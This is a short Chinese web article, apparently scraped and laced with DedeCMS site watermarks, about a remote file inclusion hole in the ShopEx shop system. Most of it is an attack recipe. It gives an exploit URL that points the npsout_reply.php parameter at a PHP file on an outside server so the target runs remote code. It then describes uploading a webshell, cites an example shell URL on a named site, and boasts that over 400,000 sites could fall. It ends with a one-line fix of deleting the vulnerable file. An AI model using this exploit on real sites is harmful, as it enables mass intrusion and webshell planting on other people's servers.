SHOPEX最新漏洞利用及解决方案
时间:2007-10-27 来源:不详 作者:林仙
简单的说.通过SHOPEX系统,我在中国的服务器上执行了美国服务器上的代码。而这个代码的主人是美国服务器。却在中国的服务器上被执行。
织梦内容管理系统
所以我在中国的服务器上执行命令。美国的服务器就乖乖的执行任务。就这么简单。
漏洞实验:
织梦好,好织梦
关键词:产品目录 联系我们 关于我们 常见问题 安全交易 购买流程 如何付款
dedecms.com
可以找到40多万个用此系统的站.也就意味着40多万个站将被沦陷.
在目标站后面加上:/shop/npsout_reply.php?INC_SYSHOMEDIR=http://www.sagi.net.cn/php.txt?
本文来自织梦
就出现了远程执行php大马的画面。 dedecms.com
然后上传php大马,就可以了。
访问:如:http://www.oicqshop.com/oicqshop/shop/bsthacker.php
内容来自dedecms
copyright dedecms
内容来自dedecms
至于解决方案.官方未公布。
可以删除shop目录下的npsout_reply.php文件。
织梦好,好织梦
织梦内容管理系统
文章评论
共有位Admini5网友发表了评论 查看完整内容